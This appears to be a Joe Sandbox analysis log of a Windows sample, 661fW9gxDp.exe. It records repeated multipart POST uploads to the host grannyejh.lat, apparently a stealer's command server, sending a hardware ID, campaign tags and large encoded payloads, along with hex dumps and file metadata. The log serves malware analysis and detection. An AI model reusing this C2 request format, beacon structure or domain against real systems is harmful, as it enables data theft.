                                                                                                                2024-12-19 07:36:37 UTC1369INData Raw: 6a 46 62 36 79 4f 75 4a 34 33 46 77 6f 45 65 6c 2b 76 64 59 2b 4f 4f 6e 4d 67 36 63 4c 76 49 79 6c 7a 70 36 52 4c 64 2f 58 66 74 48 6c 76 72 61 37 6c 67 6c 59 48 41 67 46 6a 44 6f 64 56 32 36 59 32 47 67 58 4d 2b 73 39 4f 59 42 61 54 44 45 4d 48 67 5a 65 63 7a 55 4f 73 74 70 79 75 47 7a 63 43 4a 45 35 54 74 6e 43 71 74 68 34 7a 49 4c 48 43 53 32 35 6b 54 71 73 59 4a 30 50 51 68 2f 33 46 50 70 43 79 71 62 74 53 42 78 49 63 54 6e 2b 48 51 5a 4f 6d 4e 6c 4a 70 37 4e 37 76 5a 67 52 61 6a 7a 77 58 4e 35 32 72 76 4f 55 54 6f 4a 62 51 72 6e 74 4f 48 77 6c 69 63 2b 5a 77 38 72 62 61 54 6d 47 51 7a 2f 75 47 63 42 37 2f 44 44 38 71 76 66 71 34 6d 46 75 4d 6e 35 6e 62 4d 78 38 69 46 47 35 54 67 31 57 6a 67 68 5a 32 4e 64 54 61 34 32 6f 41 45 72 38 34 44 77 2b 56 69
                                                                                                                Data Ascii: jFb6yOuJ43FwoEel+vdY+OOnMg6cLvIylzp6RLd/XftHlvra7lglYHAgFjDodV26Y2GgXM+s9OYBaTDEMHgZeczUOstpyuGzcCJE5TtnCqth4zILHCS25kTqsYJ0PQh/3FPpCyqbtSBxIcTn+HQZOmNlJp7N7vZgRajzwXN52rvOUToJbQrntOHwlic+Zw8rbaTmGQz/uGcB7/DD8qvfq4mFuMn5nbMx8iFG5Tg1WjghZ2NdTa42oAEr84Dw+Vi
                                                                                                                2024-12-19 07:36:37 UTC1369INData Raw: 52 7a 35 69 32 4c 77 73 61 47 45 5a 66 75 32 32 44 2f 69 70 4f 61 64 54 47 33 33 59 59 45 70 4d 55 49 78 2b 5a 73 37 44 4a 52 34 79 53 6a 62 73 4b 42 77 4a 52 59 77 36 48 39 61 65 61 4d 7a 39 49 30 4c 2f 4c 4a 79 67 4f 6c 69 46 71 47 37 32 76 6c 4e 56 76 6e 4a 4b 55 38 6a 63 66 56 6a 42 57 52 38 39 5a 76 36 49 32 5a 68 58 63 32 75 74 75 47 46 71 44 49 41 63 32 76 4c 36 41 34 54 71 52 7a 35 67 32 62 31 38 32 4c 46 49 33 71 33 57 66 37 6a 59 54 49 4f 6e 43 74 31 35 74 45 38 64 34 53 30 65 68 2b 72 69 59 57 34 79 66 6d 64 73 7a 48 7a 6f 6f 66 6e 65 2f 4f 59 65 75 50 6d 34 46 39 4e 4c 54 54 69 67 43 74 7a 77 66 46 34 32 72 6e 50 46 6e 67 49 71 67 6e 67 34 47 4a 7a 42 2b 44 6f 59 51 6b 7a 4a 75 58 68 48 6c 77 6f 35 36 54 52 4b 37 45 51 70 36 76 62 65 34 36 56
                                                                                                                Data Ascii: Rz5i2LwsaGEZfu22D/ipOadTG33YYEpMUIx+Zs7DJR4ySjbsKBwJRYw6H9aeaMz9I0L/LJygOliFqG72vlNVvnJKU8jcfVjBWR89Zv6I2ZhXc2utuGFqDIAc2vL6A4TqRz5g2b182LFI3q3Wf7jYTIOnCt15tE8d4S0eh+riYW4yfmdszHzoofne/OYeuPm4F9NLTTigCtzwfF42rnPFngIqgng4GJzB+DoYQkzJuXhHlwo56TRK7EQp6vbe46V
                                                                                                                2024-12-19 07:36:37 UTC1369INData Raw: 70 6d 6f 50 79 6a 78 61 56 35 73 6f 6b 38 72 2f 61 79 48 73 71 2f 49 69 7a 48 65 6e 50 44 6f 61 33 49 66 55 34 56 75 4d 78 73 43 6d 41 30 4d 79 42 46 4c 6e 75 32 33 4c 75 6a 35 65 5a 66 58 79 33 33 63 70 4b 36 63 38 61 68 72 63 68 7a 7a 68 41 35 77 53 6c 50 34 57 42 69 63 77 66 6a 61 47 45 4a 4e 50 41 68 6f 74 6b 4d 37 50 42 74 45 54 78 30 54 79 47 35 48 66 6e 4c 31 58 79 49 4b 73 69 6e 66 2b 48 31 45 7a 4a 73 34 34 32 76 35 2f 55 6c 30 74 2b 2f 4e 48 4b 58 4a 44 52 51 74 43 76 4f 62 4a 78 46 76 5a 72 2f 6d 37 4c 77 74 57 65 48 70 6a 33 33 79 50 54 76 72 4f 65 66 6a 65 73 31 35 30 4c 36 59 5a 43 79 61 38 35 32 58 39 66 34 7a 43 33 4f 49 48 52 77 4d 77 6e 31 61 48 45 4a 4c 58 41 6f 59 74 36 50 72 76 47 6d 30 6d 4f 33 67 6a 42 2f 32 62 33 4d 42 61 71 61 36
                                                                                                                Data Ascii: pmoPyjxaV5sok8r/ayHsq/IizHenPDoa3IfU4VuMxsCmA0MyBFLnu23Luj5eZfXy33cpK6c8ahrchzzhA5wSlP4WBicwfjaGEJNPAhotkM7PBtETx0TyG5HfnL1XyIKsinf+H1EzJs442v5/Ul0t+/NHKXJDRQtCvObJxFvZr/m7LwtWeHpj33yPTvrOefjes150L6YZCya852X9f4zC3OIHRwMwn1aHEJLXAoYt6PrvGm0mO3gjB/2b3MBaqa6
                                                                                                                2024-12-19 07:36:37 UTC1369INData Raw: 31 35 6f 44 31 2b 6e 66 66 76 65 2b 71 71 4e 34 4e 72 76 4b 6a 51 4b 50 36 45 4b 49 72 32 36 67 5a 32 2b 6b 59 2b 59 52 77 6f 48 66 7a 45 44 62 31 4e 39 71 34 34 65 43 6d 54 6b 59 6e 2b 71 77 52 6f 58 50 46 34 54 62 5a 76 41 75 58 65 6b 6e 35 6d 44 4d 78 34 66 55 53 4e 57 68 32 48 57 74 32 4d 54 61 4c 32 58 76 68 39 70 57 74 6f 59 62 68 76 6b 68 75 47 30 59 70 44 6e 6d 64 73 79 47 78 4a 34 4b 6e 65 4c 4b 5a 36 71 2b 71 71 39 36 4e 37 33 47 6d 68 4f 6d 39 6a 7a 54 37 47 2f 75 4f 45 44 31 61 2b 68 75 67 34 47 66 74 56 6a 54 6f 65 4d 71 72 5a 6a 55 30 44 51 46 76 39 36 45 41 37 2f 5a 54 2b 48 68 5a 75 45 70 52 76 4d 6b 35 6d 44 4d 78 34 66 55 53 74 57 68 32 48 57 74 32 4d 54 61 4c 32 58 76 68 39 70 57 74 6f 59 62 68 76 6b 68 75 47 30 59 70 44 6e 6d 64 73 79
                                                                                                                Data Ascii: 15oD1+nffve+qqN4NrvKjQKP6EKIr26gZ2+kY+YRwoHfzEDb1N9q44eCmTkYn+qwRoXPF4TbZvAuXekn5mDMx4fUSNWh2HWt2MTaL2Xvh9pWtoYbhvkhuG0YpDnmdsyGxJ4KneLKZ6q+qq96N73GmhOm9jzT7G/uOED1a+hug4GftVjToeMqrZjU0DQFv96EA7/ZT+HhZuEpRvMk5mDMx4fUStWh2HWt2MTaL2Xvh9pWtoYbhvkhuG0YpDnmdsy
                                                                                                                2024-12-19 07:36:37 UTC1369INData Raw: 4e 57 68 30 43 53 31 77 4a 57 43 5a 44 32 7a 31 38 59 44 73 38 39 43 69 4b 39 76 6f 47 63 57 35 53 47 32 49 34 50 47 69 34 6f 57 6c 61 48 44 4b 76 54 41 67 73 67 73 59 2f 4b 51 6d 45 54 78 69 45 58 46 2f 58 50 6d 50 45 44 6e 62 4a 67 51 6f 64 50 41 6e 42 76 5a 30 4e 46 67 2b 35 57 58 6d 48 4d 4f 67 76 32 59 41 37 6e 4c 51 50 66 35 59 75 41 78 55 61 52 6c 35 6a 62 4d 6d 59 65 68 43 70 7a 78 33 79 53 6a 77 4a 6a 49 4c 48 43 78 77 6f 30 55 71 6f 51 46 33 4f 67 68 2f 33 46 50 70 44 33 6d 64 74 2b 50 68 35 35 59 77 36 47 62 61 75 43 42 6c 34 5a 33 49 71 37 57 69 52 4b 71 6a 7a 7a 34 77 6e 50 6e 4c 31 57 6d 47 71 73 71 6d 74 54 45 6e 42 2b 6c 33 2f 46 32 36 70 43 58 79 6c 67 33 73 64 79 30 4f 70 37 5a 42 64 61 74 52 2b 4d 70 56 61 52 6c 35 6a 62 4d 6d 59 65 68
                                                                                                                Data Ascii: NWh0CS1wJWCZD2z18YDs89CiK9voGcW5SG2I4PGi4oWlaHDKvTAgsgsY/KQmETxiEXF/XPmPEDnbJgQodPAnBvZ0NFg+5WXmHMOgv2YA7nLQPf5YuAxUaRl5jbMmYehCpzx3ySjwJjILHCxwo0UqoQF3Ogh/3FPpD3mdt+Ph55Yw6GbauCBl4Z3Iq7WiRKqjzz4wnPnL1WmGqsqmtTEnB+l3/F26pCXylg3sdy0Op7ZBdatR+MpVaRl5jbMmYeh


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.9 | 49728 | 104.21.64.80 | 443 | 7684 | C:\Users\user\Desktop\661fW9gxDp.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-19 07:36:39 UTC | 276 | OUT | POST /api HTTP/1.1
                                                                                                                Connection: Keep-Alive
                                                                                                                Content-Type: multipart/form-data; boundary=PAPFBR4QJTLV5VS
                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                Content-Length: 12827
                                                                                                                Host: grannyejh.lat
                                                                                                                2024-12-19 07:36:39 UTC12827OUTData Raw: 2d 2d 50 41 50 46 42 52 34 51 4a 54 4c 56 35 56 53 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 45 39 35 34 31 42 38 41 45 45 43 35 38 31 39 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 50 41 50 46 42 52 34 51 4a 54 4c 56 35 56 53 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 50 41 50 46 42 52 34 51 4a 54 4c 56 35 56 53 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 0d 0a 2d 2d 50 41 50 46 42
                                                                                                                Data Ascii: --PAPFBR4QJTLV5VSContent-Disposition: form-data; name="hwid"EE9541B8AEEC5819AC8923850305D13E--PAPFBR4QJTLV5VSContent-Disposition: form-data; name="pid"2--PAPFBR4QJTLV5VSContent-Disposition: form-data; name="lid"PsFKDg--pablo--PAPFB
2024-12-19 07:36:40 UTC | 1116 | IN | HTTP/1.1 200 OK
                                                                                                                Date: Thu, 19 Dec 2024 07:36:40 GMT
                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                Transfer-Encoding: chunked
                                                                                                                Connection: close
                                                                                                                Set-Cookie: PHPSESSID=c5t6algjp811j91v3lcuo964id; expires=Mon, 14 Apr 2025 01:23:18 GMT; Max-Age=9999999; path=/
                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                Pragma: no-cache
                                                                                                                X-Frame-Options: DENY
                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                vary: accept-encoding
                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JMWuRdIhaayhmZL3V6AYmBEgokIm5SPyPJSl0fIqVd1nCmc3SqVLbhQoYVoYNYxMeE9hd2Yg%2BcuipnRJpeqAD5oVz6Eli8UHVYdHbEXFbcrlHWiKvzWGSFywbJmmyvLx"}],"group":"cf-nel","max_age":604800}
                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                Server: cloudflare
                                                                                                                CF-RAY: 8f45b90e199f41c0-EWR
                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1564&min_rtt=1564&rtt_var=782&sent=11&recv=18&lost=0&retrans=1&sent_bytes=4202&recv_bytes=13761&delivery_rate=258635&cwnd=210&unsent_bytes=0&cid=3d0591fff7c764ee&ts=983&x=0"
2024-12-19 07:36:40 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
Data Ascii: fok 8.46.123.189
2024-12-19 07:36:40 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.9 | 49734 | 104.21.64.80 | 443 | 7684 | C:\Users\user\Desktop\661fW9gxDp.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-19 07:36:41 UTC | 274 | OUT | POST /api HTTP/1.1
                                                                                                                Connection: Keep-Alive
                                                                                                                Content-Type: multipart/form-data; boundary=J0AX77C9TIVJ7
                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                Content-Length: 15033
                                                                                                                Host: grannyejh.lat
                                                                                                                2024-12-19 07:36:41 UTC15033OUTData Raw: 2d 2d 4a 30 41 58 37 37 43 39 54 49 56 4a 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 45 39 35 34 31 42 38 41 45 45 43 35 38 31 39 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 4a 30 41 58 37 37 43 39 54 49 56 4a 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 4a 30 41 58 37 37 43 39 54 49 56 4a 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 0d 0a 2d 2d 4a 30 41 58 37 37 43 39 54 49 56
                                                                                                                Data Ascii: --J0AX77C9TIVJ7Content-Disposition: form-data; name="hwid"EE9541B8AEEC5819AC8923850305D13E--J0AX77C9TIVJ7Content-Disposition: form-data; name="pid"2--J0AX77C9TIVJ7Content-Disposition: form-data; name="lid"PsFKDg--pablo--J0AX77C9TIV
                                                                                                                2024-12-19 07:36:42 UTC1123INHTTP/1.1 200 OK
                                                                                                                Date: Thu, 19 Dec 2024 07:36:42 GMT
                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                Transfer-Encoding: chunked
                                                                                                                Connection: close
                                                                                                                Set-Cookie: PHPSESSID=v5rasbd3snnmrq88qu8ltba16i; expires=Mon, 14 Apr 2025 01:23:21 GMT; Max-Age=9999999; path=/
                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                Pragma: no-cache
                                                                                                                X-Frame-Options: DENY
                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                vary: accept-encoding
                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Xi12Di2CoTR1sbW2Rr4kCuDXzQlZB5TkYfnS7jsJwNtKiXdGeb8%2BuycDFgI9AGpNTnhSd3zGzejch4HSZL5VLLB0XqbQBvau1woJpbP%2Fh%2BgJU5ZF8bUD4cw%2BgCeWH00C"}],"group":"cf-nel","max_age":604800}
                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                Server: cloudflare
                                                                                                                CF-RAY: 8f45b91c6a4d728d-EWR
                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1820&min_rtt=1818&rtt_var=685&sent=11&recv=18&lost=0&retrans=0&sent_bytes=2829&recv_bytes=15965&delivery_rate=1592148&cwnd=234&unsent_bytes=0&cid=ab1ce6bc231c1278&ts=875&x=0"
                                                                                                                2024-12-19 07:36:42 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                Data Ascii: fok 8.46.123.189
                                                                                                                2024-12-19 07:36:42 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                Data Ascii: 0


Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
4          | 192.168.2.9 | 49742       | 104.21.64.80   | 443              | 7684 | C:\Users\user\Desktop\661fW9gxDp.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-19 07:36:43 UTC | 280 | OUT | POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=PEPULYB9QC75IWHJ1QG
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 20585
    Host: grannyejh.lat
2024-12-19 07:36:43 UTC | 15331 | OUT | Data Ascii:
    --PEPULYB9QC75IWHJ1QG
    Content-Disposition: form-data; name="hwid"

    EE9541B8AEEC5819AC8923850305D13E
    --PEPULYB9QC75IWHJ1QG
    Content-Disposition: form-data; name="pid"

    3
    --PEPULYB9QC75IWHJ1QG
    Content-Disposition: form-data; name="lid"

    PsFKDg--pa
2024-12-19 07:36:43 UTC | 5254 | OUT | Data Raw: (non-printable payload; hex and ASCII dumps omitted)
2024-12-19 07:36:44 UTC | 1122 | IN | HTTP/1.1 200 OK
    Date: Thu, 19 Dec 2024 07:36:44 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: PHPSESSID=il92dl83r8l2jpv1b30eet2hic; expires=Mon, 14 Apr 2025 01:23:23 GMT; Max-Age=9999999; path=/
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate
    Pragma: no-cache
    X-Frame-Options: DENY
    X-Content-Type-Options: nosniff
    X-XSS-Protection: 1; mode=block
    cf-cache-status: DYNAMIC
    vary: accept-encoding
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=znn8hOvaLne0zBzWJMgCCXi5d%2FSeH75tnlNGf90cSTO1qb8urc1nrCGWX0Nx9ypX62HFSvLDxZKY8HIWj9zMszLwQpyFGMCD0H%2FKmGqYTG2i97fmER66UjCsm7%2FYQwbB"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8f45b92a8dc44258-EWR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=1582&min_rtt=1574&rtt_var=607&sent=11&recv=26&lost=0&retrans=0&sent_bytes=2830&recv_bytes=21545&delivery_rate=1776155&cwnd=181&unsent_bytes=0&cid=cf1da25fbb35ff0a&ts=1013&x=0"
2024-12-19 07:36:44 UTC | 20 | IN | Data Ascii:
    f
    ok 8.46.123.189
2024-12-19 07:36:44 UTC | 5 | IN | Data Ascii:
    0


Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
5          | 192.168.2.9 | 49749       | 104.21.64.80   | 443              | 7684 | C:\Users\user\Desktop\661fW9gxDp.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-19 07:36:46 UTC | 271 | OUT | POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=XEG88966N4N
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 1180
    Host: grannyejh.lat
2024-12-19 07:36:46 UTC | 1180 | OUT | Data Ascii:
    --XEG88966N4N
    Content-Disposition: form-data; name="hwid"

    EE9541B8AEEC5819AC8923850305D13E
    --XEG88966N4N
    Content-Disposition: form-data; name="pid"

    1
    --XEG88966N4N
    Content-Disposition: form-data; name="lid"

    PsFKDg--pablo
    --XEG88966N4N
    Cont
2024-12-19 07:36:47 UTC | 1116 | IN | HTTP/1.1 200 OK
    Date: Thu, 19 Dec 2024 07:36:47 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: PHPSESSID=8lje20a5qfapl26f5fhp87moog; expires=Mon, 14 Apr 2025 01:23:26 GMT; Max-Age=9999999; path=/
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate
    Pragma: no-cache
    X-Frame-Options: DENY
    X-Content-Type-Options: nosniff
    X-XSS-Protection: 1; mode=block
    cf-cache-status: DYNAMIC
    vary: accept-encoding
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RqK5fwho7xWrAPvLYgtOB5eLoU6ZqPnxQ4GYjmjDfqUzIU7Q0CDR8c3LbF7s64lsnh%2FNjhDrcMkuf2haOc2DEVADftucm%2BS1mRb4YdaRUaPG352Ujxcq5vZHfqNYAqV1"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8f45b93c3b8e43ef-EWR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=2353&min_rtt=2348&rtt_var=891&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2830&recv_bytes=2087&delivery_rate=1221246&cwnd=237&unsent_bytes=0&cid=423d71baf009e616&ts=870&x=0"
2024-12-19 07:36:47 UTC | 20 | IN | Data Ascii:
    f
    ok 8.46.123.189
2024-12-19 07:36:47 UTC | 5 | IN | Data Ascii:
    0


Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
6          | 192.168.2.9 | 49758       | 104.21.64.80   | 443              | 7684 | C:\Users\user\Desktop\661fW9gxDp.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-19 07:36:49 UTC | 279 | OUT | POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=1B66W53CLPJIG2NL2
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 584873
    Host: grannyejh.lat
2024-12-19 07:36:49 UTC | 15331 | OUT | Data Ascii:
    --1B66W53CLPJIG2NL2
    Content-Disposition: form-data; name="hwid"

    EE9541B8AEEC5819AC8923850305D13E
    --1B66W53CLPJIG2NL2
    Content-Disposition: form-data; name="pid"

    1
    --1B66W53CLPJIG2NL2
    Content-Disposition: form-data; name="lid"

    PsFKDg--pablo
    -
2024-12-19 07:36:49 UTC | 9 x 15331 | OUT | Data Raw: (nine further chunks of non-printable payload; hex and ASCII dumps omitted)
2024-12-19 07:36:52 UTC | 1127 | IN | HTTP/1.1 200 OK
    Date: Thu, 19 Dec 2024 07:36:52 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: PHPSESSID=82gctt35iesdam94copc6tm49g; expires=Mon, 14 Apr 2025 01:23:31 GMT; Max-Age=9999999; path=/
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate
    Pragma: no-cache
    X-Frame-Options: DENY
    X-Content-Type-Options: nosniff
    X-XSS-Protection: 1; mode=block
    cf-cache-status: DYNAMIC
    vary: accept-encoding
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=e%2FoorjkvkVrhPZqg4XkVUotwJSKI%2BKxloxCSouuZ%2FERU7trbk0CsmcCqZOXj7xOWLp0AuoHHiLkzsljnNmdhyBqC9VXauRRn3E4dhi7jwrXpU9mv2jNTWAUezJ6dgH%2Be"}],"group":"cf-nel","max_age":604800}
                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                Server: cloudflare
                                                                                                                CF-RAY: 8f45b94d08250cae-EWR
                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1571&min_rtt=1565&rtt_var=599&sent=352&recv=608&lost=0&retrans=0&sent_bytes=2830&recv_bytes=587460&delivery_rate=1806930&cwnd=252&unsent_bytes=0&cid=7e575a0b9caa6a15&ts=3357&x=0"

                                                                                                                Target ID:0
                                                                                                                Start time:02:36:29
                                                                                                                Start date:19/12/2024
                                                                                                                Path:C:\Users\user\Desktop\661fW9gxDp.exe
                                                                                                                Wow64 process (32bit):true
                                                                                                                Commandline:"C:\Users\user\Desktop\661fW9gxDp.exe"
                                                                                                                Imagebase:0xdb0000
                                                                                                                File size:1'841'664 bytes
                                                                                                                MD5 hash:18C608E128D658AEF6E267668DDB68E2
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:low
                                                                                                                Has exited:true

                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000003.1575977746.0000000000C69000.00000004.00000020.00020000.00000000.sdmp, Offset: 00C69000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_3_c69000_661fW9gxDp.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: z
                                                                                                                  • API String ID: 0-1657960367
                                                                                                                  • Opcode ID: 72383e81d9725a0467a36b7e8c0513bf7cdc0f4defb17823d62a8dd52804f3ac
                                                                                                                  • Instruction ID: 7e659044b3c521ff6149bfea8480ee39759c09b3aa7321665f4fd0f0a968be21
                                                                                                                  • Opcode Fuzzy Hash: 72383e81d9725a0467a36b7e8c0513bf7cdc0f4defb17823d62a8dd52804f3ac
                                                                                                                  • Instruction Fuzzy Hash: 0A71679540E7D54FD3235BB849A96857FB09E27264B1E46DBC0E0CF1F3E259094AC723